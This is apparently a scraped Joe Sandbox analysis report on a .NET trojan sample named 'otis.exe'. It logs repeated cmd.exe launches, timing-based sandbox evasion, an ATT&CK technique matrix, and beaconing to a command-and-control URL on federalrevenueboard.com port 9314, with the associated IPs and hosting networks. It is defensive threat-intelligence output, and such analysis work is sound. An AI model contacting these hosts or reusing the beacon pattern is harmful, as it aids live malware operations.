Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: sspicli.dllJump to behavior
Source: otis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: otis.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: otis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: otis.exeStatic PE information: 0xB658ECE9 [Sat Dec 11 08:18:49 2066 UTC]
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B8A00BD pushad ; iretd 0_2_00007FFD9B8A00C1

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49759
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeMemory allocated: 2107E290000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\otis.exeMemory allocated: 21018000000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\otis.exeWindow / User API: threadDelayed 4141Jump to behavior
Source: C:\Users\user\Desktop\otis.exeWindow / User API: threadDelayed 5715Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -23980767295822402s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1196Thread sleep count: 4141 > 30Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1196Thread sleep count: 5715 > 30Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -99890s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -99781s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -99671s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -99562s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -99453s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -99340s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -99234s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -99124s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -99015s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -98906s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 1608Thread sleep time: -98796s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 99890Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 99781Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 99671Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 99562Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 99453Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 99340Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 99234Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 99124Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 99015Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 98906Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 98796Jump to behavior
Source: otis.exe, 00000000.00000002.4128577991.000002107E06B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\otis.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\otis.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeQueries volume information: C:\Users\user\Desktop\otis.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\otis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\otis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\otis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
1
Disable or Modify Tools
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media11
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS12
System Information Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA SecretsInternet Connection DiscoverySSHKeylogging2
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554908 Sample: otis.exe Startdate: 13/11/2024 Architecture: WINDOWS Score: 64 33 federalrevenueboard.com 2->33 39 Suricata IDS alerts for network traffic 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Uses known network protocols on non-standard ports 2->43 45 AI detected suspicious sample 2->45 8 otis.exe 14 2 2->8         started        signatures3 process4 dnsIp5 35 192.121.170.106, 49737, 49739, 49741 EDIS-AS-EUAT Sweden 8->35 37 federalrevenueboard.com 91.132.92.231, 49736, 49738, 49740 ALEXHOSTMD Moldova Republic of 8->37 11 cmd.exe 1 8->11         started        13 cmd.exe 8->13         started        15 cmd.exe 8->15         started        17 9 other processes 8->17 process6 process7 19 conhost.exe 11->19         started        21 conhost.exe 13->21         started        23 conhost.exe 15->23         started        25 conhost.exe 17->25         started        27 conhost.exe 17->27         started        29 conhost.exe 17->29         started        31 6 other processes 17->31

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
otis.exe42%ReversingLabsByteCode-MSIL.Trojan.Zilla
otis.exe52%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
federalrevenueboard.com1%VirustotalBrowse
SourceDetectionScannerLabelLink
http://federalrevenueboard.com:931420%Avira URL Cloudsafe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5h0%Avira URL Cloudsafe
http://federalrevenueboard.com0%Avira URL Cloudsafe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5P0%Avira URL Cloudsafe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.50%Avira URL Cloudsafe
http://federalrevenueboard.com:93140%Avira URL Cloudsafe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.52%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
federalrevenueboard.com
91.132.92.231
truefalseunknown
NameMaliciousAntivirus DetectionReputation
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5false
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://federalrevenueboard.com:93142otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5Potis.exe, 00000000.00000002.4126891226.0000021000001000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameotis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    http://federalrevenueboard.comotis.exe, 00000000.00000002.4126891226.0000021000149000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000107000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000AF000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001FA000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001E0000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5hotis.exe, 00000000.00000002.4126891226.000002100019B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001FA000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000F3000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://federalrevenueboard.com:9314otis.exe, 00000000.00000002.4126891226.0000021000149000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100019B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000F9000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000270000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001E0000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    91.132.92.231
    federalrevenueboard.comMoldova Republic of
    200019ALEXHOSTMDfalse
    192.121.170.106
    unknownSweden
    57169EDIS-AS-EUATtrue
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1554908
    Start date and time:2024-11-13 08:04:05 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 6m 23s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:29
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:otis.exe
    Detection:MAL
    Classification:mal64.troj.winEXE@37/0@1/2
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 95%
    • Number of executed functions: 5
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Override analysis time to 240000 for current running targets taking high CPU consumption
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtReadVirtualMemory calls found.
    TimeTypeDescription
    02:05:25API Interceptor12531514x Sleep call for process: otis.exe modified
    No context
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    ALEXHOSTMDarmv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 91.208.162.247
    mips.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 91.208.162.247
    m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 91.208.162.247
    powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 91.208.162.247
    armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 91.208.162.247
    sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 91.208.162.247
    x86.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 91.208.162.247
    mips.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 91.208.162.247
    sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 91.208.162.247
    mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 91.208.162.247
    EDIS-AS-EUATssowoface.dllGet hashmaliciousUnknownBrowse
    • 192.36.61.122
    ssowoface.dllGet hashmaliciousUnknownBrowse
    • 192.36.61.122
    msws.msiGet hashmaliciousORPCBackdoorBrowse
    • 151.236.9.174
    msws.msiGet hashmaliciousORPCBackdoorBrowse
    • 151.236.9.174
    Mcb5K3TOWT.exeGet hashmaliciousUnknownBrowse
    • 192.36.38.33
